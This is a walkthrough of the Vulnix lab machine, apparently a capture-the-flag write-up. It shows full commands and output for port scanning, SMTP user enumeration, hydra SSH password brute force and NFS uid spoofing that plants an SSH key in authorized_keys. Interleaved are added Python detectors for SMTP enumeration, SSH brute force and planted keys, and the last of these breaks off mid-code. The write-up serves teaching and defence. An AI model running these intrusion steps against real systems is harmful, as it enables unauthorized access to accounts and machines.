0x01 Reconnaissance

Find the target machine's IP

└─$ nmap -sP 192.168.44.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-19 09:55 CST
Nmap scan report for 192.168.44.129
Host is up (0.00088s latency).
Nmap scan report for 192.168.44.230
Host is up (0.0013s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 75.43 seconds

Enumerate the ports open on the target

└─$ sudo nmap -sS -sV -T4 -A -p- 192.168.44.230
[sudo] password for nathan:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-19 09:58 CST
Nmap scan report for 192.168.44.230
Host is up (0.00073s latency).
Not shown: 65518 closed tcp ports (reset)
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
|   2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_  256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp    open  smtp       Postfix smtpd
|_ssl-date: 2022-11-19T02:01:58+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=vulnix
| Not valid before: 2012-09-02T17:40:12
|_Not valid after:  2022-08-31T17:40:12
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
79/tcp    open  finger     Linux fingerd
|_finger: No one logged on.\x0D
110/tcp   open  pop3?
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after:  2022-09-02T17:40:22
|_ssl-date: 2022-11-19T02:01:58+00:00; +3s from scanner time.
|_pop3-capabilities: STLS CAPA SASL UIDL TOP RESP-CODES PIPELINING
111/tcp   open  rpcbind    2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      39367/tcp6  mountd
|   100005  1,2,3      50406/tcp   mountd
|   100005  1,2,3      52541/udp   mountd
|   100005  1,2,3      52651/udp6  mountd
|   100021  1,3,4      41141/tcp   nlockmgr
|   100021  1,3,4      45141/udp6  nlockmgr
|   100021  1,3,4      50156/udp   nlockmgr
|   100021  1,3,4      53587/tcp6  nlockmgr
|   100024  1          46920/tcp   status
|   100024  1          51756/tcp6  status
|   100024  1          52813/udp   status
|   100024  1          53709/udp6  status
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
143/tcp   open  imap       Dovecot imapd
|_imap-capabilities: LOGIN-REFERRALS more have ID LITERAL+ listed capabilities Pre-login IDLE post-login SASL-IR LOGINDISABLEDA0001 OK STARTTLS IMAP4rev1 ENABLE
|_ssl-date: 2022-11-19T02:01:58+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after:  2022-09-02T17:40:22
512/tcp   open  exec       netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  tcpwrapped
993/tcp   open  ssl/imap   Dovecot imapd
|_ssl-date: 2022-11-19T02:01:58+00:00; +3s from scanner time.
|_imap-capabilities: LOGIN-REFERRALS more ID have Pre-login listed SASL-IR IDLE post-login AUTH=PLAINA0001 capabilities OK ENABLE IMAP4rev1 LITERAL+
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after:  2022-09-02T17:40:22
995/tcp   open  ssl/pop3s?
|_ssl-date: 2022-11-19T02:01:58+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after:  2022-09-02T17:40:22
|_pop3-capabilities: CAPA SASL(PLAIN) TOP UIDL USER RESP-CODES PIPELINING
2049/tcp  open  nfs_acl    2-3 (RPC #100227)
40909/tcp open  mountd     1-3 (RPC #100005)
41141/tcp open  nlockmgr   1-4 (RPC #100021)
42577/tcp open  mountd     1-3 (RPC #100005)
46920/tcp open  status     1 (RPC #100024)
50406/tcp open  mountd     1-3 (RPC #100005)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=11/19%OT=22%CT=1%CU=35710%PV=Y%DS=2%DC=T%G=Y%TM=637839
OS:14%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=8)OP
OS:S(O1=M5B4ST11NW3%O2=M5B4ST11NW3%O3=M5B4NNT11NW3%O4=M5B4ST11NW3%O5=M5B4ST
OS:11NW3%O6=M5B4ST11)WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6=3890)EC
OS:N(R=Y%DF=Y%T=40%W=3908%O=M5B4NNSNW3%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=6979%RUD=G)IE(R=Y%DFI=N%T=4
OS:0%CD=S)

Network Distance: 2 hops
Service Info: Host:  vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 2s

TRACEROUTE (using port 3306/tcp)
HOP RTT     ADDRESS
1   0.20 ms DESKTOP-NRNV04H.mshome.net (172.23.32.1)
2   0.81 ms 192.168.44.230

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 217.88 seconds
Segmentation fault

0x02 Get Shell

This time there is no port 80, but port 25, SMTP (Simple Mail Transfer Protocol), is open. An enumeration tool can be used to gather information and obtain account names through these SMTP commands:

  • VRFY confirms whether a username exists
  • EXPN expands a mailing list
  • RCPT TO specifies a recipient
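From the defender's side, the same three commands leave a trail in the mail log: Postfix writes a `NOQUEUE: reject: VRFY ...` or `NOQUEUE: reject: RCPT ...` line for every probe of a non-existent user, so a burst of unknown-user rejects from one client is the signature of the enumeration described above. The following script is an added example, not part of the original write-up; the log lines are constructed for it (the timestamps simply mirror the scan time shown later on this page), and the thresholds are assumptions to tune per site.

```python
# Added example (not from the original write-up): detect SMTP user enumeration
# (VRFY / RCPT TO probing) in Postfix logs. Sample log lines are constructed.
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one client hammering VRFY/RCPT against unknown users,
# plus a single legitimate relay mistyping one address.
SAMPLE_MAILLOG = """\
Nov 19 10:46:18 vulnix postfix/smtpd[2211]: connect from unknown[192.168.44.129]
Nov 19 10:46:18 vulnix postfix/smtpd[2211]: NOQUEUE: reject: VRFY from unknown[192.168.44.129]: 550 5.1.1 <aaron>: Recipient address rejected: User unknown in local recipient table; to=<aaron> proto=SMTP helo=<kali>
Nov 19 10:46:18 vulnix postfix/smtpd[2211]: NOQUEUE: reject: VRFY from unknown[192.168.44.129]: 550 5.1.1 <abby>: Recipient address rejected: User unknown in local recipient table; to=<abby> proto=SMTP helo=<kali>
Nov 19 10:46:19 vulnix postfix/smtpd[2211]: NOQUEUE: reject: VRFY from unknown[192.168.44.129]: 550 5.1.1 <adam>: Recipient address rejected: User unknown in local recipient table; to=<adam> proto=SMTP helo=<kali>
Nov 19 10:46:19 vulnix postfix/smtpd[2211]: NOQUEUE: reject: RCPT from unknown[192.168.44.129]: 550 5.1.1 <alice@vulnix>: Recipient address rejected: User unknown in local recipient table; from=<x@kali> to=<alice@vulnix> proto=SMTP helo=<kali>
Nov 19 10:46:25 vulnix postfix/smtpd[2211]: disconnect from unknown[192.168.44.129]
Nov 19 11:02:03 vulnix postfix/smtpd[2304]: NOQUEUE: reject: RCPT from mail.example.org[198.51.100.7]: 550 5.1.1 <bob@vulnix>: Recipient address rejected: User unknown in local recipient table; from=<bob@example.org> to=<bob@vulnix> proto=ESMTP helo=<mail.example.org>
"""

# Matches Postfix smtpd's reject line for an unknown local user, whether the
# probe came in as VRFY or as RCPT TO.
PROBE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ postfix/smtpd\[\d+\]: "
    r"NOQUEUE: reject: (?P<cmd>VRFY|RCPT) from \S+\[(?P<ip>[\d.]+)\]: "
    r"550 .*User unknown"
)


def parse_probes(log_text, year=2022):
    """Return (timestamp, client_ip, command) for every rejected unknown-user
    probe. Syslog lines carry no year, so it is passed in."""
    probes = []
    for line in log_text.splitlines():
        m = PROBE_RE.match(line)
        if m:
            ts = datetime.strptime(f'{year} {m["ts"]}', "%Y %b %d %H:%M:%S")
            probes.append((ts, m["ip"], m["cmd"]))
    return probes


def find_enumerators(log_text, threshold=3, window=timedelta(minutes=5)):
    """Map client IP -> peak number of unknown-user rejects inside any
    `window`, for clients reaching `threshold`. A legitimate relay that
    mistypes one address stays far below a wordlist-driven scanner."""
    per_ip = defaultdict(list)
    for ts, ip, _cmd in parse_probes(log_text):
        per_ip[ip].append(ts)
    flagged = {}
    for ip, times in per_ip.items():
        times.sort()
        start = worst = 0
        for end, t in enumerate(times):          # sliding window over sorted times
            while t - times[start] > window:
                start += 1
            worst = max(worst, end - start + 1)
        if worst >= threshold:
            flagged[ip] = worst
    return flagged


def vrfy_enabled(ehlo_commands):
    """Given the command list a server advertises (the text of nmap's
    smtp-commands line), say whether VRFY is exposed. Postfix disables it
    with `disable_vrfy_command = yes` in main.cf."""
    return "VRFY" in [c.strip().upper() for c in ehlo_commands.split(",")]


if __name__ == "__main__":
    print(find_enumerators(SAMPLE_MAILLOG))
    print(vrfy_enabled("vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS"))
```

Disabling VRFY removes only the cheapest probe; RCPT TO rejects still reveal account existence, which is why the detector counts both, and why rate limiting unknown-recipient rejects per client (Postfix's `smtpd_hard_error_limit`) is the more complete mitigation.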

The enumeration tool smtp-user-enum does not seem to be preinstalled, so install it first:

└─$ pip install smtp-user-enum
Defaulting to user installation because normal site-packages is not writeable
Collecting smtp-user-enum
  Downloading smtp_user_enum-0.5.0-py2.py3-none-any.whl (12 kB)
Collecting argparse
  Downloading argparse-1.4.0-py2.py3-none-any.whl (23 kB)
Installing collected packages: argparse, smtp-user-enum
Successfully installed argparse-1.4.0 smtp-user-enum-0.5.0

Its options:

  • -M  the username-guessing method: EXPN, VRFY or RCPT (default VRFY)
  • -U  file of usernames to check against the SMTP service
  • -t  host running the SMTP service

Note that the run below identifies itself as smtp-user-enum v1.2 from pentestmonkey.net, i.e. the Perl tool that was already on the system, not the pip package just installed; the options listed are those of the pentestmonkey version.

-U takes the wordlist file:

└─$ smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/namelist.txt -t 192.168.44.230
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /usr/share/wordlists/metasploit/namelist.txt
Target count ............. 1
Username count ........... 1909
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............

######## Scan started at Sat Nov 19 10:46:18 2022 #########
192.168.44.230: backup exists
192.168.44.230: games exists
192.168.44.230: irc exists
192.168.44.230: mail exists
192.168.44.230: news exists
192.168.44.230: proxy exists
192.168.44.230: root exists
192.168.44.230: syslog exists
192.168.44.230: user exists
######## Scan completed at Sat Nov 19 10:46:25 2022 #########
9 results.

1909 queries in 7 seconds (272.7 queries / sec)

The accounts found so far are backup, games, irc, mail, news, proxy, root, syslog and user. How do we get a password?

First, use finger to look up login information (is this step really necessary?). finger looks up and displays user information, for users on the local host as well as on remote hosts; account names are not case-sensitive. Run with no arguments, finger shows the login information of every user currently on the local host: account name, real name, login terminal, idle time, login time, address and phone number.

└─$ finger user@192.168.44.230
Login: user                             Name: user
Directory: /home/user                   Shell: /bin/bash
Never logged in.
No mail.
No Plan.

Login: dovenull                         Name: Dovecot login user
Directory: /nonexistent                 Shell: /bin/false
Never logged in.
No mail.
No Plan.

Next, use hydra to brute-force the SSH password. Unlike the other tools tried earlier, although it also works from a wordlist, it supports many different protocols and can be used against ssh, telnet, ftp and so on. Usage examples:

Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh

The parameters used in those examples:

  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -4 / -6   use IPv4 (default) / IPv6 addresses (put always in [] also in -M)

Normally -L is given a list of login names (a txt file) and combined with a password wordlist, but for now we only brute-force the user account, so the username is typed directly. -t sets how many connections are opened to the target at once; the aim is to test whether hydra can find credentials that log in to the SSH service.

└─$ hydra -l user -P /usr/share/wordlists/rockyou.txt -t 6 ssh://192.168.44.230
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-19 13:57:54
[DATA] max 6 tasks per 1 server, overall 6 tasks, 14344399 login tries (l:1/p:14344399), ~2390734 tries per task
[DATA] attacking ssh://192.168.44.230:22/
[STATUS] 66.00 tries/min, 66 tries in 00:01h, 14344333 to do in 3622:19h, 6 active
[STATUS] 51.00 tries/min, 153 tries in 00:03h, 14344246 to do in 4687:40h, 6 active
[STATUS] 43.71 tries/min, 306 tries in 00:07h, 14344093 to do in 5468:53h, 6 active
[22][ssh] host: 192.168.44.230   login: user   password: letmein
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-19 14:09:56

The wordlist used here is /usr/share/wordlists/rockyou.txt; /usr/share/wordlists/metasploit/password.lst could also be used, but cracking takes too long.
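A run like the one above is hard to miss on the target: sshd logs every attempt to auth.log, and hydra's 40 to 60 tries per minute from one address produces a burst of `Failed password` lines followed, if it succeeds, by an `Accepted password` from the same source. The script below is an added example, not part of the original write-up; its log lines are constructed (the addresses mirror the lab above) and the thresholds are assumptions.

```python
# Added example (not from the original write-up): detect an SSH password
# brute-force run in sshd's auth.log, and flag a success that follows one.
# The log lines are constructed for this example.
import re
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_AUTHLOG = """\
Nov 19 13:57:55 vulnix sshd[1402]: Failed password for user from 192.168.44.129 port 50210 ssh2
Nov 19 13:57:55 vulnix sshd[1403]: Failed password for user from 192.168.44.129 port 50212 ssh2
Nov 19 13:57:56 vulnix sshd[1404]: Failed password for user from 192.168.44.129 port 50214 ssh2
Nov 19 13:57:56 vulnix sshd[1405]: Failed password for invalid user admin from 192.168.44.129 port 50216 ssh2
Nov 19 13:57:57 vulnix sshd[1406]: Failed password for user from 192.168.44.129 port 50218 ssh2
Nov 19 13:58:01 vulnix sshd[1407]: Failed password for user from 192.168.44.129 port 50220 ssh2
Nov 19 14:09:55 vulnix sshd[1998]: Accepted password for user from 192.168.44.129 port 51877 ssh2
Nov 19 14:20:10 vulnix sshd[2050]: Failed password for user from 192.168.44.1 port 40001 ssh2
Nov 19 14:20:30 vulnix sshd[2051]: Accepted password for user from 192.168.44.1 port 40003 ssh2
"""

# sshd's "Failed/Accepted <method> for [invalid user] <name> from <ip> port <n>" lines.
AUTH_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_auth_log(text, year=2022):
    """Return (timestamp, result, method, user, ip) for each logged attempt."""
    events = []
    for line in text.splitlines():
        m = AUTH_RE.match(line)
        if m:
            ts = datetime.strptime(f'{year} {m["ts"]}', "%Y %b %d %H:%M:%S")
            events.append((ts, m["result"], m["method"], m["user"], m["ip"]))
    return events


def _max_in_window(times, window):
    """Largest number of timestamps that fall inside any span of `window`."""
    times = sorted(times)
    start = worst = 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        worst = max(worst, end - start + 1)
    return worst


def detect_bruteforce(text, threshold=5, window=timedelta(minutes=10)):
    """Map source IP -> peak failures per window for sources at or above
    `threshold`. A tool trying dozens of passwords a minute crosses this in
    seconds; a user who mistypes a password once or twice does not."""
    failures = defaultdict(list)
    for ts, result, _method, _user, ip in parse_auth_log(text):
        if result == "Failed":
            failures[ip].append(ts)
    peaks = {ip: _max_in_window(times, window) for ip, times in failures.items()}
    return {ip: n for ip, n in peaks.items() if n >= threshold}


def suspicious_successes(text, threshold=5, lookback=timedelta(minutes=15)):
    """Accepted logins preceded by at least `threshold` failures from the same
    source within `lookback`: the signature of a guessed password."""
    events = parse_auth_log(text)
    hits = []
    for ts, result, method, user, ip in events:
        if result != "Accepted":
            continue
        prior = sum(1 for t2, r2, _m, _u, ip2 in events
                    if ip2 == ip and r2 == "Failed" and ts - lookback <= t2 < ts)
        if prior >= threshold:
            hits.append((ip, user, method, ts))
    return hits


if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_AUTHLOG))
    print(suspicious_successes(SAMPLE_AUTHLOG))
```

The second check is the one worth alerting on: a burst of failures that ends in success means the password was weak enough to be found, and the account needs a reset. Lowering `MaxAuthTries` in sshd_config slows a single connection down, fail2ban blocks the source after a few failures, and `PasswordAuthentication no` removes the attack surface entirely.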

Log in with ssh:

└─$ ssh user@192.168.44.230
The authenticity of host '192.168.44.230 (192.168.44.230)' can't be established.
ECDSA key fingerprint is SHA256:IGOuLMZRTuUvY58a8TN+ef/1zyRCAHk0qYP4wMViOAg.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.44.230' (ECDSA) to the list of known hosts.
user@192.168.44.230's password:
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat Nov 19 06:18:19 GMT 2022

  System load:  0.02             Processes:           90
  Usage of /:   90.4% of 773MB   Users logged in:     0
  Memory usage: 7%               IP address for eth0: 192.168.44.230
  Swap usage:   0%

  => / is using 90.4% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/

Your Ubuntu release is not supported anymore.
For upgrade information, please visit:
http://www.ubuntu.com/releaseendoflife

New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

user@vulnix:~$

Next, look around for anything useful for privilege escalation.

Let's look at NFS:

└─$ showmount -e 192.168.44.230
Export list for 192.168.44.230:
/home/vulnix *

This means the target exports the vulnix user's home directory, so we mount it.

┌──(kali㉿kali)-[~]
└─$ sudo mkdir /mnt/nfs
[sudo] password for kali: 

┌──(kali㉿kali)-[~]
└─$ sudo mount -t nfs 192.168.44.230:/home/vulnix /mnt/nfs

┌──(kali㉿kali)-[~]
└─$ cd /mnt                                         

┌──(kali㉿kali)-[/mnt]
└─$ cd nfs 
cd: permission denied: nfs


┌──(kali㉿kali)-[/mnt]
└─$ ls -al
total 12
drwxr-xr-x  3 root   root    4096 Nov 19 03:20 .
drwxr-xr-x 18 root   root    4096 Aug  8 06:57 ..
drwxr-x---  2 nobody nogroup 4096 Sep  2  2012 nfs

Note that the commands above only work in a virtual machine; they do not work under WSL2. Although the share is mounted, we cannot enter it; presumably root_squash is set.

  • no_root_squash: if the user who logs in to the NFS host to use the shared directory is root, that user has root privileges on the shared directory.
  • root_squash: if the user who logs in to the NFS host to use the shared directory is root, that user's privileges are squashed down to an anonymous user, usually with the UID and GID of the nobody system account.

We probably cannot change root_squash to no_root_squash right now, but since what is mounted is vulnix's home directory, we can create a user on the attacking machine with the same username, uid and gid, and then use that identity to get in.

So we need to find out vulnix's uid and gid. First ssh in with the user credentials obtained earlier, then look at /etc/passwd:

└─$ ssh user@192.168.44.230
The authenticity of host '192.168.44.230 (192.168.44.230)' can't be established.
ECDSA key fingerprint is SHA256:IGOuLMZRTuUvY58a8TN+ef/1zyRCAHk0qYP4wMViOAg.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.44.230' (ECDSA) to the list of known hosts.
user@192.168.44.230's password: 
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat Nov 19 16:40:53 GMT 2022

  System load:  0.0              Processes:           89
  Usage of /:   84.7% of 773MB   Users logged in:     0
  Memory usage: 9%               IP address for eth0: 192.168.44.230
  Swap usage:   0%

  Graph this data and manage this system at https://landscape.canonical.com/

Your Ubuntu release is not supported anymore.
For upgrade information, please visit:
http://www.ubuntu.com/releaseendoflife

New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Sat Nov 19 06:18:19 2022 from 192.168.44.1
user@vulnix:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),100(users)
user@vulnix:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
postfix:x:104:110::/var/spool/postfix:/bin/false
dovecot:x:105:112:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:106:65534:Dovecot login user,,,:/nonexistent:/bin/false
landscape:x:107:113::/var/lib/landscape:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
vulnix:x:2008:2008::/home/vulnix:/bin/bash
statd:x:109:65534::/var/lib/nfs:/bin/false

Both the uid and gid are 2008. Next, create an identical account on the attacking machine:

┌──(kali㉿kali)-[/mnt]
└─$ sudo groupadd -g 2008 vulnix                          
[sudo] password for kali: 

┌──(kali㉿kali)-[/mnt]
└─$ sudo adduser vulnix -uid=2008 -gid=2008
Adding user `vulnix' ...
Adding new user `vulnix' (2008) with group `vulnix' ...
Creating home directory `/home/vulnix' ...
Copying files from `/etc/skel' ...
New password: 
Retype new password: 
No password has been supplied.
New password: 
Retype new password: 
passwd: password updated successfully
Changing the user information for vulnix
Enter the new value, or press ENTER for the default
        Full Name []: 
        Room Number []: 
        Work Phone []: 
        Home Phone []: 
        Other []: 
Is the information correct? [Y/n] Y

Next, switch to the vulnix account, move into the nfs directory and see what files are in it:

┌──(kali㉿kali)-[/mnt]
└─$ su - vulnix                            
Password: 
┌──(vulnix㉿kali)-[~]
└─$ cd /mnt/nfs                                                              

┌──(vulnix㉿kali)-[/mnt/nfs]
└─$ ls -la                                                                   
total 20
drwxr-x--- 2 vulnix vulnix 4096 Sep  2  2012 .
drwxr-xr-x 3 root   root   4096 Nov 19 03:20 ..
-rw-r--r-- 1 vulnix vulnix  220 Apr  3  2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr  3  2012 .bashrc
-rw-r--r-- 1 vulnix vulnix  675 Apr  3  2012 .profile

Inside there are only the usual common files. Now comes the clever part: create an SSH key inside the NFS share, so that the fake account we created turns into the real vulnix account on the target!

┌──(kali㉿kali)-[/mnt]
└─$ sudo passwd root
[sudo] password for kali: 
New password: 
Retype new password: 
passwd: password updated successfully

┌──(kali㉿kali)-[/mnt]
└─$ su              
Password: 
┌──(root㉿kali)-[/mnt]
└─# cd

┌──(root㉿kali)-[~]
└─# pwd 
/root                                                                            

┌──(root㉿kali)-[~]
└─# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Created directory '/root/.ssh'.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:XYggyHFUzP276r4usW0H63whDKf4ZJVMWuv1BqTLkJI root@kali
The key's randomart image is:
+---[RSA 3072]----+
| ..+++o.         |
|  o. .o.+...     |
|     . *.*. .    |
|    E = B.+.     |
|     o XSo.+     |
|    . = B o o    |
|     + + + +     |
|      +.+ +      |
|       BO=       |
+----[SHA256]-----+


┌──(root㉿kali)-[~]
└─# pwd
/root

┌──(root㉿kali)-[~]
└─# cd /root/.ssh

┌──(root㉿kali)-[~/.ssh]
└─# ls
id_rsa  id_rsa.pub                                                                                                                                                         

┌──(root㉿kali)-[~/.ssh]
└─# cp id_rsa.pub /mnt

┌──(root㉿kali)-[~/.ssh]
└─# exit

┌──(kali㉿kali)-[/mnt]
└─$ su - vulnix
Password: 
┌──(vulnix㉿kali)-[~]
└─$ cd /mnt                                                                  

┌──(vulnix㉿kali)-[/mnt]
└─$ ls                                                                       
id_rsa.pub  nfs

┌──(vulnix㉿kali)-[/mnt]
└─$ mkdir /mnt/nfs/.ssh
mkdir: cannot create directory ‘/mnt/nfs/.ssh’: File exists


┌──(vulnix㉿kali)-[/mnt]
└─$ cd nfs/.ssh

┌──(vulnix㉿kali)-[/mnt/nfs/.ssh]
└─$ cp /mnt/id_rsa.pub authorized_keys                                       

┌──(vulnix㉿kali)-[/mnt/nfs/.ssh]
└─$ ls                                                                       
authorized_keys

First set a password for the root account, log in as root and run ssh-keygen to generate the key pair, giving id_rsa.pub. The thing to watch is that the generated public key must first be moved, as root, to a location the vulnix user can also access, and then moved by vulnix into .ssh under the nfs mount.

Next, log in:

┌──(kali㉿kali)-[~/.ssh]
└─$ ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i id_rsa  vulnix@192.168.44.230
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sun Nov 20 10:00:26 GMT 2022

  System load:  0.0              Processes:           88
  Usage of /:   90.2% of 773MB   Users logged in:     0
  Memory usage: 7%               IP address for eth0: 192.168.44.230
  Swap usage:   0%

  => / is using 90.2% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/

Your Ubuntu release is not supported anymore.
For upgrade information, please visit:
http://www.ubuntu.com/releaseendoflife

New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

vulnix@vulnix:~$

What needs special attention is this ssh parameter:

-o 'PubkeyAcceptedKeyTypes +ssh-rsa'

Without this parameter, passwordless login simply does not work. However, as with creating the key, we need to tell our SSH client to accept the old ssh-rsa algorithm. (OpenSSH 8.8 and later disable the SHA-1-based ssh-rsa signature scheme by default, and the target's OpenSSH 5.9 cannot negotiate the newer rsa-sha2-* variants.)
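The whole foothold above rests on a public key being written into `.ssh/authorized_keys` of a home directory that an NFS client could reach, so the defensive counterpart is to audit those files by key fingerprint rather than by the (attacker-chosen) comment. The script below is an added example, not part of the original write-up: it computes the same `SHA256:` fingerprint that `ssh-keygen -lf` prints and that newer sshd versions write in their `Accepted publickey` log lines, and compares every entry against an allow-list. The sample keys are constructed from meaningless numbers purely as parser input.

```python
# Added example (not from the original write-up): audit authorized_keys
# entries by fingerprint so a key planted through a writable NFS home
# directory stands out. Sample keys are constructed, not real key material.
import base64
import hashlib
import struct

KEY_TYPES = {"ssh-rsa", "ssh-dss", "ssh-ed25519",
             "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}


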